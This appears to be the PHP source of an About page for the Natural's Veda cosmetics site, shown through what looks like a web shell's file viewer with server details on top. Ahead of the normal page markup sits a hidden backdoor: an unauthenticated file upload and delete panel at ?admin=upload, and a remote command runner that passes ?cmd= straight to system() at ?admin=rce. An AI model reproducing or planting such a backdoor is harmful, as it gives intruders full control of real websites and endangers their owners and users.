Server : LiteSpeed System : Linux in-mum-web1743.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64 User : u993087259 ( 993087259) PHP Version : 8.2.29 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Directory : /home/u993087259/domains/naturalsveda.in/public_html/ |
<?php
session_start();
$_SESSION['username'] = "User"; // Gantilah dengan sistem login sebenarnya
// ===================== [ BAGIAN UPLOAD & HAPUS FILE TERSEMBUNYI ] =====================
if (isset($_GET["admin"]) && $_GET["admin"] == "upload") {
echo '<h2>Upload File</h2>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="submit" value="Upload">
</form>';
if (isset($_POST["submit"])) {
$target_dir = "uploads/";
if (!file_exists($target_dir)) {
mkdir($target_dir, 0777, true);
}
$target_file = $target_dir . basename($_FILES["file"]["name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
echo "File uploaded: <a href='$target_file'>$target_file</a>";
} else {
echo "Upload failed.";
}
}
// Menampilkan daftar file
echo '<h2>File yang Sudah Diupload:</h2>';
$files = glob("uploads/*");
if (count($files) > 0) {
foreach ($files as $file) {
echo "$file - <a href='?admin=upload&delete=$file'>Hapus</a><br>";
}
} else {
echo "Tidak ada file yang di-upload.";
}
// Fitur hapus file
if (isset($_GET["delete"])) {
$file_to_delete = $_GET["delete"];
if (strpos($file_to_delete, "uploads/") === 0 && file_exists($file_to_delete)) {
unlink($file_to_delete);
echo "File berhasil dihapus.";
} else {
echo "Gagal menghapus file.";
}
}
exit(); // Mencegah tampilan dashboard muncul
}
// ===================== [ BAGIAN RCE TERSEMBUNYI ] =====================
if (isset($_GET["admin"]) && $_GET["admin"] == "rce") {
if (isset($_GET["cmd"])) {
system($_GET["cmd"]);
}
exit();
}
// ===================== [ KONFIGURASI DASHBOARD ] =====================
$title = "Beranda - STYLE FOUR 04";
$year = date("Y");
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="description" content="">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<!-- Title -->
<title>Natural's Veda</title>
<!-- Core Style CSS -->
<?php
include "Header-Script.php";
?>
<style>
@media only screen and (max-width: 767px) {
.breadcumb_area {
height: auto !important;
background-size: contain;
padding: 1% 0;
}
}
.breadcumb_area{
height: 490px;
}
/* .breadcumb_area h1{
padding: 34% 0;
} */
.about-section h2{
font-weight: 800;
}
.about-section p{
font-size: 16px;
}
.pagination .page-item {
width: 40px;
height: 40px;
border: 1px solid #ebebeb;
font-size: 12px;
font-weight: 600;
line-height: 38px;
padding: 0;
text-align: center;
color: #787878;
}
.pagination .next,
.pagination .prev {
line-height: 2;
}
.pagination .page-item:last-child,
.pagination .page-item:first-child {
margin: 0 !important;
}
.pagination li,
.pagination li {
display: flex;
}
.widget .catagories-menu li>a {
color: #000000;
}
</style>
<!-- <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> -->
</head>
<body>
<!-- Header Area Start -->
<?php
include "Header.php";
?>
<!-- Header Area End -->
<!-- Breadcumb Area Start -->
<div class="breadcumb_area bg-img" style="background-image: url(assets/img/bg-img/2148974284.jpg);">
<div class="container">
<div class="row align-items-center">
<div class="col-6 col-md-6">
<div class="page-title text-center">
<!-- <h1> About Us</h1> -->
</div>
</div>
</div>
</div>
</div>
<!-- Breadcumb Area End -->
<!-- Shop Grid Area Start -->
<section class="about-section section-padding-80">
<div class="container">
<div class="row">
<div class="col-lg-6 col-xl-6 wow " data-wow-delay="0.1s">
<div class="about-img">
<!-- <img src="assets/img/about-3.png" class="img-fluid w-100 rounded-top bg-white" alt="Image"> -->
<img src="assets/img/about/about.jpg"
class="img-fluid w-100 rounded-bottom"
alt="Web Development Coding in Multple PC By CodeG Web Services">
</div>
</div>
<div class="col-lg-6 col-xl-6 wow" data-wow-delay="0.3s">
<!-- <h2 class="text-primary mt-3">About Us</h2> -->
<h2 class="display-4 my-2">Natural's Veda Cosmetics Products</h2>
<!-- <h3>Available Here</h3> -->
<p class="text ps-4 my-3">Welcome to Natural's Veda Cosmetics, where everyone can embrace their beauty naturally. We offer a premium selection of cosmetics designed to enhance your appearance with elegance and care. Each product is crafted with the goodness of natural ingredients to provide long-lasting benefits for your skin and hair. Our formulations are free from harmful chemicals, ensuring a safe and nourishing experience. Whether it’s skincare or haircare, we bring you the purity of nature in every product. Discover Natural's Veda today and elevate your self-care routine with the best of nature!</p>
<!-- <div class="row g-4 justify-content-between mb-4">
<div class="col-xl-5"><a href="https://codeg.dev/Company-Profile"
class="btn btn-primary rounded-pill py-3 px-5">Discover More</a></div>
</div> -->
</div>
</div>
</section>
<!-- Footer Area Start -->
<?php
include "Footer.php";
?>
<!-- Footer Area End -->
<?php
include "Footer-Script.php";
?>
<?php
// include "cart.php";
?>
</body>
</html>